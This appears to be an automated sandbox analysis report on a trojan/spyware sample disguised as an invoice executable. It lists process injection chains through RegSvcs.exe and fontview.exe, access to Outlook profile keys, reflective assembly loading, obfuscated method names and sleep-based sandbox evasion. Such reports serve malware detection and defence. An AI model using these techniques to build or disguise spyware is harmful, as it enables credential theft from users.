            Source: Invoice_&_SOA_ready_for_dispatch.exe, 00000000.00000002.1267129512.0000000007560000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Invoice_&_SOA_ready_for_dispatch.exe
            Source: Invoice_&_SOA_ready_for_dispatch.exeBinary or memory string: OriginalFilenamegpHbg.exeF vs Invoice_&_SOA_ready_for_dispatch.exe
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Invoice_&_SOA_ready_for_dispatch.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exe
            Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_&_SOA_ready_for_dispatch.exe.log
            Source: C:\Windows\SysWOW64\fontview.exeFile created: C:\Users\user\AppData\Local\Temp\2N-F32-85
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@14/11
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, wXBrPU2mKX2DW6Sp7G.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, wXBrPU2mKX2DW6Sp7G.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: _0020.AddAccessRule
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeMutant created: \Sessions\1\BaseNamedObjects\GxEmeREskI
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\fontview.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fontview.pdbGCTL source: RegSvcs.exe, 00000004.00000002.1351063486.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3734199569.00000000007FE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fontview.pdb source: RegSvcs.exe, 00000004.00000002.1351063486.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3734199569.00000000007FE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274005512.0000000000CBE000.00000002.00000001.01000000.0000000C.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3728661562.0000000000CBE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: RegSvcs.pdb, source: fontview.exe, 0000000C.00000002.3736597685.0000000004DA3000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3733416579.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406933440.0000000002CF3000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1583264064.000000003F053000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1353081257.0000000004896000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1351034381.00000000046EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, fontview.exe, 0000000C.00000003.1353081257.0000000004896000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1351034381.00000000046EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegSvcs.pdb source: fontview.exe, 0000000C.00000002.3736597685.0000000004DA3000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3733416579.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406933440.0000000002CF3000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1583264064.000000003F053000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: firefox.pdb source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Invoice_&_SOA_ready_for_dispatch.exe, --.cs.Net Code: _0002
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.cs.Net Code: LsT03lLd9Q System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.cs.Net Code: LsT03lLd9Q System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.5670000.3.raw.unpack, hA.cs.Net Code: wP
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.5670000.3.raw.unpack, hA.cs.Net Code: Rd System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_072B64D5 push FFFFFF8Bh; iretd 0_2_072B64D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040D053 push ebx; ret 4_2_0040D055
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040183F push ecx; ret 4_2_00401841
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004130F2 push ecx; ret 4_2_004130F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00423153 pushfd ; iretd 4_2_00423168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B159 push ss; iretd 4_2_0041B15A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041095B push edx; ret 4_2_0041097E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00410963 push edx; ret 4_2_0041097E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042B9E2 push eax; ret 4_2_0042B9E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00414224 pushfd ; iretd 4_2_00414225
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A228 pushad ; retf 4_2_0041A229
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402363 push ecx; ret 4_2_0040236D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402308 push ecx; ret 4_2_0040236D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040D325 push gs; ret 4_2_0040D32D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00417BD9 push edi; retf 4_2_00417BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00403390 push eax; ret 4_2_00403392
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040148D push ecx; ret 4_2_004015A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00401490 push ecx; ret 4_2_004015A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00418584 push ds; retf 4_2_0041859D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041859E push ds; retf 4_2_0041859D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004015A5 push ecx; ret 4_2_004015A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00417DB6 push esi; ret 4_2_00417DB7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041466B push edi; ret 4_2_0041466C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004016D4 push ecx; ret 4_2_004016D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00401690 push ecx; ret 4_2_004016B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040CF05 push eax; retf 4_2_0040CF0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00412790 push cs; retf 4_2_00412794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014609AD push ecx; mov dword ptr [esp], ecx4_2_014609B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0143135E push eax; iretd 4_2_01431369
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A709AD push ecx; mov dword ptr [esp], ecx12_2_04A709B6
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A422B8 push cs; ret 12_2_02A423AA
            Source: initial sampleStatic PE information: section name: .text entropy: 7.937047832644545
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, OCeGR9WhUIbmo58hGM.csHigh entropy of concatenated method names: 'Dispose', 'S2b4OCjSNc', 'z6aK5hHNRL', 'ji6mm6OVSD', 'DHq4gmhxKc', 'Id04zJUbLY', 'ProcessDialogKey', 'LZcKXcnAp6', 'PiGK4Z2w8H', 'BWMKKHuINe'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, FhqF3be3IiJ78OZX0B.csHigh entropy of concatenated method names: 'iJD9s1ruR2', 'RZC9Lnny3K', 'XIn9wNksZP', 'pgZwgjk7f9', 'ixywze9IUG', 'q4x9Xso9P0', 'd1V94J1Cvh', 'QQ49KvIbHY', 'F699eYUr3W', 'SEF901dK1p'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, hqa0uvwF8y24dfnEmR.csHigh entropy of concatenated method names: 'xdi9jIR5Cj', 'TVW96JE1bE', 'mDg93v7iZV', 'piZ9xQGFV4', 'p0F9VlrsOU', 'rvr9TPPOuw', 'K6D9yUaS6B', 'YbE9JbEYcs', 'ou59R3mIPE', 'fLD9i5oWTG'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, CWH5un3Y7hXN01WGKc4.csHigh entropy of concatenated method names: 'Ng7tj8HcP9', 'ddQt6kFZxA', 'PTIt3Ashuo', 'vLStx16EMM', 'ut7tVGA6Tm', 'Q6XtTbx57d', 'fU8tyjDw7B', 'O1OtJrcYm2', 'mgNtRGSttm', 'hKptiZ4Rip'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, k7qEmYaQgpXjRvxX0y.csHigh entropy of concatenated method names: 'SjkvHLySEw', 'bQHvg3LIxt', 'KIPSX8Gxm8', 'tkKS4TcLdk', 'a2VvhVIwEt', 'aBgvDnrSRK', 'rUdvURaZIO', 'RkmvMB83U2', 'DnLvkEt5ye', 'LAivAcADEf'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, kn3HsVKGcYhQIYc6U1.csHigh entropy of concatenated method names: 'Hag3CTPFA', 'jFcxeDImu', 'BAeTyTbNs', 'cyGy5olns', 'tAmRn63Dl', 'kXSiGOjk5', 'AAdq2s7cY5xMiw0S3I', 'UHK7AioHjQ2GhK5bYD', 'BDYSiQPxW', 'wyrIH3V5Y'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, GiG0pYCKrDVP3rTfDp.csHigh entropy of concatenated method names: 'QU1uJIMdBL', 'jJjuR91ERu', 'Mqku7qyntM', 'eWZu5Q3MLF', 't3ZuC4anai', 'ptsuYEV1L7', 'FYlu118j8i', 'TOPublhwIa', 'SrcuFUgGL7', 'guDuhpAml1'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, aOMcGCJjyGfal9CoD2.csHigh entropy of concatenated method names: 'iCUaVfcOxe', 'KUtaybPXFa', 'SNMLGyP8Zw', 'DNBLC2U4E6', 'NNnLY7GqKY', 'ttSLEliY9Y', 'qLfL1iiLUe', 'gPpLbZdS26', 'rdwLQWrCBs', 'LCYLF1e4bs'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, RFebm5uyGmJYMUbdFA.csHigh entropy of concatenated method names: 'UG9LxeiU1t', 'XeOLT3nAsA', 'SqvLJb2Jlv', 'jBWLRUNZwd', 'g76L2DHYYY', 'LnKL8hbaco', 'vySLvX67EA', 'PUDLStN0oX', 'yHOLtfy8uH', 'EoGLIXjoEC'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.csHigh entropy of concatenated method names: 'EPwelUQ884', 'cFNesYs68v', 'KaoeWPZuJP', 'N0KeLYXxo1', 'UOwea72VT0', 'tZ7ewqQkyQ', 'MWie9a3EFM', 'tjoedRcg49', 's5JeBI9oPS', 'ikyeqg79at'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, wXBrPU2mKX2DW6Sp7G.csHigh entropy of concatenated method names: 'jA6WMF2PhT', 'gjWWkLwcOc', 'VZ3WAIa5Yu', 'nlGWpNvBFu', 'HKPWnh41p0', 'w4JWZmZ6Qe', 'fxuWPI9OlX', 'qejWHlbSq5', 'kpYWOrI9Xq', 'md9WgNafeT'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, VAe6BLDV3qOgFyVjiC.csHigh entropy of concatenated method names: 'wh52Fr2Kpv', 'PyF2DHNFOf', 'HtS2MYNhyD', 'VVc2kgYpOB', 'qCd25KCW0E', 'xf72GqwFMV', 'sgo2C6gQsa', 'G6Y2YTkWHd', 'npY2EDTgeN', 'NGE21un9CM'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, pwk0XiziCPB2HQD6SY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E5ItuwumBb', 'eZTt2dfUIh', 'rdwt8TGKI4', 'YsYtvmcWNv', 'h9MtSRhCQ9', 'hh6ttFNuSj', 'uuRtIqqPR5'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, mphZeO71kLwSC61AIp.csHigh entropy of concatenated method names: 'BIFt4C3NJl', 'KFQteGELqR', 'Y88t06BrZL', 'DvKtsRQjFt', 'OH9tWjF4cC', 'naUtaOSbBU', 'N5ntwd2yfJ', 'dd0SPO5AMe', 'GqOSHG9gdJ', 'E57SOPTmXY'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, wuWA6eL3mDAw53PRlj.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nDBKOIW0du', 'fpiKgjjmO3', 'HIAKzTxLu2', 'OUDeXdMOf7', 'UWhe4OgO0r', 'eQ6eKxuM6Z', 'Ndneeljn2S', 'OpPg46zMp7N97AtbiF'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, qf4GXpZFHWDeRXEG4U.csHigh entropy of concatenated method names: 'MHywlWPJXf', 'TVawWxRqi5', 'vxbwavEJWE', 't9Iw9xL4Ch', 'LF3wdwtk6c', 'd98anSFTQU', 'hxDaZBk04u', 'Y9HaPtoHA6', 'AnjaHm58Gh', 'uXZaOKTkLa'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, LwJl6CvUyeg8svQ1xg.csHigh entropy of concatenated method names: 'ToString', 'on18hLbRQM', 'P11852XEaS', 'm278G5GCSn', 'mUl8C7OhKN', 'c998YwQckJ', 'i9J8EFi91L', 'BaC81C2WNj', 'VOb8bWfPm8', 'YXh8QLKtbH'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, wuiZa4ArYNDqxPaeeT.csHigh entropy of concatenated method names: 'pogS7uU8Is', 'YfYS5cgaNu', 'j6oSG20Yp5', 'DBGSCMZU2k', 'z9pSMgt05Y', 'vjjSYsttls', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, fEHLeR3dPPRvbC3VFV4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CYpIM9gywr', 'jIdIkOFylC', 'W0BIAEa2Pa', 'XEiIph19JH', 'lcpInwabxP', 'BTZIZBOKJ1', 'AdGIP7HXt4'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, WZ1B83N7tm7Z8cDgrB.csHigh entropy of concatenated method names: 'SocSs3A5hL', 'Sh5SWjDkVY', 'FUVSLIvpOM', 'FrQSaiObsX', 'F7VSwUrDaW', 'vcXS9ikPHE', 'AWJSdWlRPD', 'RAcSBlEB8U', 'UaRSqae5CN', 'huqSf7xsFQ'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, U78ry4qNS50VEaZ2mE.csHigh entropy of concatenated method names: 'Clf49tC78P', 'o9p4dWG7vP', 'hnk4qKkp29', 'r5j4fXZw7L', 'qM142tNt6o', 'Ltx48bTAK6', 'yQR9tSxVRZ9YMZNLJA', 'wvnnUFCH7eA4g6uRP0', 'MZC44o2pXP', 'ULD4esfweN'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, OCeGR9WhUIbmo58hGM.csHigh entropy of concatenated method names: 'Dispose', 'S2b4OCjSNc', 'z6aK5hHNRL', 'ji6mm6OVSD', 'DHq4gmhxKc', 'Id04zJUbLY', 'ProcessDialogKey', 'LZcKXcnAp6', 'PiGK4Z2w8H', 'BWMKKHuINe'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, FhqF3be3IiJ78OZX0B.csHigh entropy of concatenated method names: 'iJD9s1ruR2', 'RZC9Lnny3K', 'XIn9wNksZP', 'pgZwgjk7f9', 'ixywze9IUG', 'q4x9Xso9P0', 'd1V94J1Cvh', 'QQ49KvIbHY', 'F699eYUr3W', 'SEF901dK1p'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, hqa0uvwF8y24dfnEmR.csHigh entropy of concatenated method names: 'xdi9jIR5Cj', 'TVW96JE1bE', 'mDg93v7iZV', 'piZ9xQGFV4', 'p0F9VlrsOU', 'rvr9TPPOuw', 'K6D9yUaS6B', 'YbE9JbEYcs', 'ou59R3mIPE', 'fLD9i5oWTG'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, CWH5un3Y7hXN01WGKc4.csHigh entropy of concatenated method names: 'Ng7tj8HcP9', 'ddQt6kFZxA', 'PTIt3Ashuo', 'vLStx16EMM', 'ut7tVGA6Tm', 'Q6XtTbx57d', 'fU8tyjDw7B', 'O1OtJrcYm2', 'mgNtRGSttm', 'hKptiZ4Rip'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, k7qEmYaQgpXjRvxX0y.csHigh entropy of concatenated method names: 'SjkvHLySEw', 'bQHvg3LIxt', 'KIPSX8Gxm8', 'tkKS4TcLdk', 'a2VvhVIwEt', 'aBgvDnrSRK', 'rUdvURaZIO', 'RkmvMB83U2', 'DnLvkEt5ye', 'LAivAcADEf'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, kn3HsVKGcYhQIYc6U1.csHigh entropy of concatenated method names: 'Hag3CTPFA', 'jFcxeDImu', 'BAeTyTbNs', 'cyGy5olns', 'tAmRn63Dl', 'kXSiGOjk5', 'AAdq2s7cY5xMiw0S3I', 'UHK7AioHjQ2GhK5bYD', 'BDYSiQPxW', 'wyrIH3V5Y'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, GiG0pYCKrDVP3rTfDp.csHigh entropy of concatenated method names: 'QU1uJIMdBL', 'jJjuR91ERu', 'Mqku7qyntM', 'eWZu5Q3MLF', 't3ZuC4anai', 'ptsuYEV1L7', 'FYlu118j8i', 'TOPublhwIa', 'SrcuFUgGL7', 'guDuhpAml1'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, aOMcGCJjyGfal9CoD2.csHigh entropy of concatenated method names: 'iCUaVfcOxe', 'KUtaybPXFa', 'SNMLGyP8Zw', 'DNBLC2U4E6', 'NNnLY7GqKY', 'ttSLEliY9Y', 'qLfL1iiLUe', 'gPpLbZdS26', 'rdwLQWrCBs', 'LCYLF1e4bs'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, RFebm5uyGmJYMUbdFA.csHigh entropy of concatenated method names: 'UG9LxeiU1t', 'XeOLT3nAsA', 'SqvLJb2Jlv', 'jBWLRUNZwd', 'g76L2DHYYY', 'LnKL8hbaco', 'vySLvX67EA', 'PUDLStN0oX', 'yHOLtfy8uH', 'EoGLIXjoEC'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.csHigh entropy of concatenated method names: 'EPwelUQ884', 'cFNesYs68v', 'KaoeWPZuJP', 'N0KeLYXxo1', 'UOwea72VT0', 'tZ7ewqQkyQ', 'MWie9a3EFM', 'tjoedRcg49', 's5JeBI9oPS', 'ikyeqg79at'
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\fontview.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: Invoice_&_SOA_ready_for_dispatch.exe PID: 7784, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe TID: 7844 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\fontview.exe TID: 7708 Thread sleep count: 1491 > 30
            Source: C:\Windows\SysWOW64\fontview.exe TID: 7708 Thread sleep time: -2982000s >= -30000s
            Source: C:\Windows\SysWOW64\fontview.exe TID: 7708 Thread sleep count: 8482 > 30
            Source: C:\Windows\SysWOW64\fontview.exe TID: 7708 Thread sleep time: -16964000s >= -30000s
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928 Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928 Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928 Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928 Thread sleep count: 42 > 30
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928 Thread sleep time: -42000s >= -30000s
            Source: C:\Windows\SysWOW64\fontview.exe Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014A096E rdtsc
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\fontview.exe Window / User API: threadDelayed 1491
            Source: C:\Windows\SysWOW64\fontview.exe Window / User API: threadDelayed 8482
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 1.3 %
            Source: C:\Windows\SysWOW64\fontview.exe API coverage: 2.7 %
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\fontview.exe Code function: 12_2_02A4C300 FindFirstFileW, FindNextFileW, FindClose
            Source: 2N-F32-85.12.dr Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
